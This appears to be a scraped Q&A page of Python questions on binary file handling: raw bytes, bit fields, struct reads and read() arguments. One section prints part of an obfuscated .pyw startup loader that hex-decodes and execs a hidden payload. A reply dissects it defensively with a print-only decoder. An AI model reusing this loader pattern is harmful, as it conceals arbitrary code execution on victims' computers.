What am I doing wrong when encoding hexadecimal "40" in Python?

I came across what I guess is a binary file, and I am trying to generate the same kind of file with my own script. Maybe I am doing it completely wrong, but so far it has worked. Now I am stuck, and as a newcomer to binary files I can't name the problem well enough to search for an answer.
I read the "target file" as binary and found that it is mostly "\x00" bytes with a few numeric values in between (like "\x05").
What I do is something like this:
def myEncode(a):
    if a == 2: A = "\x02"
    elif a == 5: A = "\x05"
    return(A)
line = "\x00\x00\x01" + myEncode(5) + "\x00"
phrase = bytearray(line.encode("utf-8"))
f = open("outfile", "ab")
f.write(phrase)
f.close()
It would help me a lot if I could use hex() to turn the integer 5 into "\x05", but what I get is the string "0x5", which does not work when added to the file this way. I really need it to be "\x" followed by a two-digit number.
More importantly, I need to add decimal 128 (hexadecimal "\x80") and larger values. For a reason beyond my understanding, my script always writes "\xc2\x80" instead. When I create the same file with the original program, it writes only "\x80", so it must be possible somehow, but I don't know how.
Thanks for any advice, hint, or direction where to look.
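The "\xc2\x80" output described here is what UTF-8 produces for the character U+0080: every code point from 128 upward is encoded as two or more bytes. A minimal sketch of one way around it, assuming Python 3 and that every value fits in a single byte (0 to 255), is to build bytes objects directly instead of encoding a str. The helper name encode_byte is hypothetical.

```python
def encode_byte(value):
    """Return one raw byte for an integer in the range 0..255."""
    return bytes([value])  # raises ValueError for values outside 0..255

# Encoding a str as UTF-8 expands code points >= 128 to several bytes.
utf8_result = "\x80".encode("utf-8")   # b'\xc2\x80'

# Building bytes directly keeps exactly one byte per value.
record = b"\x00\x00\x01" + encode_byte(5) + b"\x00" + encode_byte(128)

# hex() returns text such as "0x5"; format() can zero-pad to two digits,
# but the result is still text, not a raw byte.
hex_text = format(5, "02x")            # '05'

print(utf8_result)
print(record)
print(hex_text)
```

The resulting record can be written with f.write(record) to a file opened in "ab" mode, with no call to encode() at all.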

Related

Trying to understand this potentially virus encrypted pyw file

Today I realised that this .pyw file had been added to my startup files.
I have already deleted it, but I want to find out what it may have done to my computer. It is obfuscated in some way and I am not very familiar with Python, but since this is the source code, I assume there is no way to encrypt it completely.
Can someone either guide me through decoding it, or check it for me?
Edit: it looks like I can only post part of it here, but it should give a brief idea of how it was obfuscated:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/

OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
    decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
    r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
    for x in r:
        if x == "ζ":
            print()
        else:
            x = chr(ord(x)-683867)
            if x in decode:
                x = decode[(decode.index(x) + 1) % len(decode)]
            print(x, end='')
Each sequence of hex digits between the / characters is decoded separately: every two hex digits are treated as one byte, and the bytes are interpreted as UTF-8 (in the posted sample, each sequence yields a single character). The character "ζ" stands for a newline. Every other character is converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or digit, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and digits increase by one, wrapping around at the end (if it's not a letter or digit, no shift is done). The result, presumably, forms a valid Python program.
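As a check, the same steps can be applied to the prefix posted in the question. The sketch below is a variant of the function above that returns the text rather than printing it; the name deobfuscate_to_str and the constant names are hypothetical. It only decodes data and never executes the result.

```python
import binascii

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
OFFSET = 683867  # magic number taken from the obfuscated script

def deobfuscate_to_str(data):
    """Decode a slash-separated hex payload into text without running it."""
    out = []
    for chunk in data.split("/"):
        if not chunk:          # a trailing "/" leaves an empty chunk
            continue
        for ch in binascii.unhexlify(chunk).decode("utf-8"):
            if ch == "ζ":      # placeholder used for newlines
                out.append("\n")
                continue
            ch = chr(ord(ch) - OFFSET)
            if ch in ALPHABET:  # shift letters and digits one step, wrapping
                ch = ALPHABET[(ALPHABET.index(ch) + 1) % len(ALPHABET)]
            out.append(ch)
    return "".join(out)

# The prefix of _sparkle exactly as posted in the question.
prefix = ("ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/"
          "f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/"
          "f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/")
decoded = deobfuscate_to_str(prefix)
print(decoded)
```

For example, f2a6bdbe is the UTF-8 encoding of code point 683902, and 683902 - 683867 = 35, which is "#".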
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

My String Is Not Converting to a Float and I have No Idea Why

I'm importing some text files and trying to plot some data, however, I keep getting the error message:
ValueError: could not convert string to float:
Here's the portion of my code that's giving me trouble. Do you see any issues with this?
Thank you!
import matplotlib.pyplot as plt
import numpy as np
import pylab
fluxdensity = []
days= []
with open('knowniaxflux.csv') as f:
    for row in f.readlines():
        row.strip('\n')
        if not row.startswith("#"):
            spaces = row.split(',')
            fluxdensity.append(float(spaces[0]))
            days.append(float(spaces[1]))

You're probably just not getting the input you expect. Use print statements to see what you're actually trying to convert (while debugging, of course; remove them later).
In addition, unless you know exactly what your input looks like, you probably need a more robust parser anyway. For example, a # might not be the first character on the line. You might want to specify an encoding when opening the file (unless you're always using ASCII on Python 2 or UTF-8 on Python 3 anyway). You might also want to strip whitespace if you expect any.
If all else fails, in my experience your file is written in the wrong encoding. Make sure your file is written using one of the encodings mentioned above, and preferably convert your binary input to Unicode (especially if you're using Python 3, where that is the str object). Read the Python Unicode HOWTO; it should make it all clear.
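A more defensive version of the loop might look like the sketch below. It assumes two comma-separated numeric columns, as in the question; the function name parse_flux_rows and the sample data are hypothetical. Instead of stopping at the first bad row, it records the offending line so it can be inspected.

```python
import io

def parse_flux_rows(lines):
    """Parse 'flux,day' rows, skipping blank lines and # comments."""
    fluxdensity, days, skipped = [], [], []
    for lineno, raw in enumerate(lines, start=1):
        row = raw.strip()  # str.strip returns a new string; keep the result
        if not row or row.startswith("#"):
            continue
        fields = [field.strip() for field in row.split(",")]
        try:
            flux, day = float(fields[0]), float(fields[1])
        except (ValueError, IndexError):
            skipped.append((lineno, raw))  # remember what failed to convert
            continue
        fluxdensity.append(flux)
        days.append(day)
    return fluxdensity, days, skipped

# Stand-in for the real file; open(..., encoding="utf-8") would also work.
sample = io.StringIO("# flux,day\n1.5, 10\n\n  # indented comment\n2.5,20\nabc,30\n")
flux, days, skipped = parse_flux_rows(sample)
print(flux, days, skipped)
```

Printing skipped with repr() makes invisible characters, such as a byte order mark or stray whitespace, visible.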

How can I convert binary data from a file to readable base two binary in Python?

In a class I am in, we are assigned to write a simple MIPS simulator. The instructions that my program is supposed to process are given in a binary file. I have no idea how to get anything usable out of that file. Here is my code:
import struct
import argparse
'''open a parser to get command line arguments '''
parser = argparse.ArgumentParser(description='Mips instruction simulator')
'''add two required arguments for the input file and the output file'''
parser.add_argument('-i', action="store", dest='infile_name', help="-i INPUT_FILE", required=True)
parser.add_argument('-o', action="store", dest='outfile_name', help="-o OUTPUT_FILE_NAME", required=True)
'''get the passed arguments'''
args = parser.parse_args()
class Disassembler:
    '''Disassembler for mips code'''
    instruction_buffer = None
    instructions_read = 0
    def __init__(self, filename):
        bin_file = None
        try:
            bin_file = open(filename, 'rb')
        except:
            print("Input file: ", filename, " could not be opened. Check the name, permissions, or path")
            quit()
        while True:
            read_bytes = bin_file.read(4)
            if (read_bytes == b''):
                break
            int_var = struct.unpack('>I', read_bytes)
            print(int_var)
        bin_file.close()
disembler = Disassembler(args.infile_name)
So, at first I just printed the 4 bytes I read to see what was returned.
I was hoping to see plain bits (just 1's and 0's). What I got, from what I've read, were byte strings. So I tried googling to find out what I could do about this, and found that I could use struct to convert these byte strings to integers. That outputs them in a format like (4294967295,).
This is still annoying, because I have to trim that to make it a usable integer, and even then I have to convert it to bits (base 2). It's nice that I can read the bytes with struct as either signed or unsigned, because half of the input file consists of signed 32-bit numbers.
All of this seems way more complicated than it should be just to get the bits out of a binary file. Is there an easier way to do this? Also, can you explain it as you would to someone who is not very familiar with esoteric Python code and is new to binary data?
My overall goal is to get the 32 bits out of each 4 bytes I've read. The beginning of the file is a list of MIPS opcodes, so I need to be able to see specific parts of these numbers, like the first 5 bits, then the next 6, and so on. The end of the file contains 32-bit signed integer values. The two halves of the file are separated by a break opcode.
Thank you for any help you can give me. It's driving me crazy that I can't find any straightforward answers through searching. If you want to see the binary file, tell me where and I'll post it.

Bear in mind that normal Python integers don't have a fixed bit width: they're as big as they need to be. This can be annoying when you want to convert signed integers to bit strings. I recommend that you stick with what you're currently doing: converting blocks of 4 bytes to unsigned integer using
n = struct.unpack('>I', read_bytes)[0]
and then using either format(n, '032b') or '{0:032b}'.format(n) to convert that to a bit string if you want to print the bits.
To access or modify the bits in an integer, you shouldn't bother with string conversion. Instead, use Python's bitwise operators: &, |, ^, <<, >>, ~. E.g., (n >> 7) & 1 gives you bit 7 of n.
Please see Unary arithmetic and bitwise operations and the following sections in the Python docs for detailed information about these operators.
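Put together, the approach can be sketched as follows. The sample word 0x012A4020 and the field boundaries (a 6-bit opcode, three 5-bit register fields, a 5-bit shift amount and a 6-bit function code, as in the standard MIPS R-type layout) are assumptions for illustration; the assignment's own file and field list may differ.

```python
import struct

raw = bytes.fromhex("012a4020")       # stand-in for bin_file.read(4)
word = struct.unpack(">I", raw)[0]    # [0] takes the integer out of the 1-tuple
bits = format(word, "032b")           # 32 characters, zero-padded

# Shift the wanted field down to bit 0, then mask off everything above it.
opcode = (word >> 26) & 0x3F          # top 6 bits
rs = (word >> 21) & 0x1F              # next 5 bits
rt = (word >> 16) & 0x1F
rd = (word >> 11) & 0x1F
shamt = (word >> 6) & 0x1F
funct = word & 0x3F                   # lowest 6 bits

# For the data half of the file, ">i" reads the same 4 bytes as signed.
signed_value = struct.unpack(">i", b"\xff\xff\xff\xfe")[0]

print(bits)
print(opcode, rs, rt, rd, shamt, funct)
print(signed_value)
```

A mask of 0x1F keeps 5 bits and 0x3F keeps 6 bits, so other field widths only need a different shift and mask.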

This way you can access each individual bit in the file.
"".join(format(i, "08b") for i in byte_string)
For example:
>>> "".join(format(i, "08b") for i in b"\x23\x54a")
'001000110101010001100001'

File read reaches end of file unexpectedly

I'm translating a script from matlab, which reads a file of binary-encoded 32-bit integers and parses them appropriately. I have written the following method that is intended to mimic matlab's fread() function:
def readi(f,n):
    x = zeros(n,int);
    for i in range(0,n):
        x[i] = struct.unpack('i',f.read(4))[0];
        print x[i];
    return x;
I call this function variously with n between 1 and 9 in my script as I parse out the data. My problem is that the script only gets part of the way into the file before I get this error:
x[i] = struct.unpack('i',f.read(4))[0];
struct.error: unpack requires a string argument of length 4
It appears that python thinks I have reached the end of the file. The point in execution where the error occurs is a line in a loop that has already been iterated over several times. In addition, the small portion of the file that has been parsed already matches exactly what my matlab script produces from the exact same file (not a copy). Matlab, however, is able to read a much larger dataset from the file. Does anyone have ideas on why this error is occurring?

In my own testing, whether the file was opened in binary mode or not (surprisingly) didn't matter. The only thing I can suggest is to make sure you understand the format of the input file exactly. So in addition to reading the MATLAB script, it might be a good idea to look at a hex dump of the file, where you can see the individual bytes of raw data and verify whether it matches your understanding of the layout of its contents.
Besides all that, you could try the following simplification/optimization of your readi() function, which does not require the temporary x list and reads the bytes of all the integers in the group with one call to file.read():
def readi(f, n):
    fmt = '%di' % n
    return struct.unpack(fmt, f.read(struct.calcsize(fmt)))
However, I don't think it will solve your problem, because it should be equivalent to what you are already doing, return-value-wise anyway (it doesn't print anything like yours does).
One final note -- you don't need to end your lines of code with a semicolon. Python isn't like C and several other languages in that respect.
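To see exactly where the data runs out, a variant of readi() can compare the number of bytes actually returned with the number requested. The sketch below assumes Python 3 and a stream opened in binary mode ('rb'); the name readi_checked and the error message are illustrative. One cause worth ruling out, as an assumption since the question does not show the open() call, is a file opened in text mode with Python 2 on Windows, where a 0x1A byte is treated as end of file.

```python
import io
import struct

def readi_checked(f, n):
    """Read n native 32-bit ints, reporting the offset of a short read."""
    fmt = "%di" % n
    size = struct.calcsize(fmt)
    data = f.read(size)
    if len(data) != size:
        start = f.tell() - len(data)   # offset where this read began
        raise EOFError("wanted %d bytes at offset %d, got %d"
                       % (size, start, len(data)))
    return struct.unpack(fmt, data)

# Stand-in for open(path, "rb"): three ints followed by two stray bytes.
stream = io.BytesIO(struct.pack("3i", 1, 2, 3) + b"\x00\x00")
first = readi_checked(stream, 3)
try:
    readi_checked(stream, 1)
    message = ""
except EOFError as exc:
    message = str(exc)

print(first)
print(message)
```

Comparing the reported offset with the file size from a hex dump shows whether the file really ends there or whether the read stopped early.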

Trying to pass a number of bytes to read() via raw_input

I'm doing some extra credit for Zed Shaw's "Learn Python The Hard Way". The extra credit for exercise 15 tells you to read through the pydoc for file to find other things you can do with files. I was interested in figuring out how to have the terminal print out a certain number of bytes of a text file using read(). I can hard-code the argument for how many bytes to read, but I hit a wall when trying to prompt the user to define the number of bytes.
Here's the script as I have it so far:
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's 24 bytes of your file %r:" % filename
print txt.read(24)
print """What about an arbitrary, not hard-coded number of bytes? Enter the number
of bytes you want read out of the txt file at this prompt, as an integer:"""
how_far = raw_input("> ")
print txt.read(how_far2) # this format makes sense in my head but obviously isn't the done thing.
terminal spits out the error:
"NameError: name 'how_far2' is not defined"
How do I prompt the user of the script to type in a number of bytes, and have the script read out that number of bytes?
BONUS QUESTIONS:
What is the actual-factual term for what I'm trying to do here? Pass a variable to a method? Pass a variable to a function?
Is the number of bytes an argument of read? Is that the correct term?
More generally, what's a good place to get a vocabulary list of python terms? Any other books Stack Overflow would recommend, or some in online documentation somewhere? Really looking for a no assumptions, no prior knowledge, "explain it to me like I'm five" level of granularity... a half hour of web-searching hasn't helped too much. I've not found terminology really collected together into any one place online despite a good amount of effort searching the web.

The error message is because you have used how_far in one place and how_far2 in the other.
You'll also need to convert how_far to an int before passing it to read, using int(how_far) for example.
You will find it can be called passing a variable, parameter or argument. These are not Python terms; they are general programming terms.

raw_input returns a string. file.read expects an integer -- likely you just need to convert the output from raw_input into an integer before you use it.
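The conversion can be sketched as below, written for Python 3, where input() replaces raw_input(). The function name read_requested_bytes and the sample text are hypothetical, and an in-memory stream stands in for the opened file so the example runs on its own.

```python
import io

def read_requested_bytes(stream, user_text):
    """Convert the typed text to an int and read that much from stream."""
    count = int(user_text)   # raises ValueError for text such as "abc"
    return stream.read(count)

txt = io.StringIO("Hello, this is a small sample file.")
first = read_requested_bytes(txt, "5")     # as if the user typed 5
second = read_requested_bytes(txt, " 7 ")  # int() ignores surrounding spaces

print(repr(first))
print(repr(second))
```

In the original script this corresponds to how_far = int(raw_input("> ")) followed by txt.read(how_far). For a file opened in text mode, read() counts characters rather than bytes.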
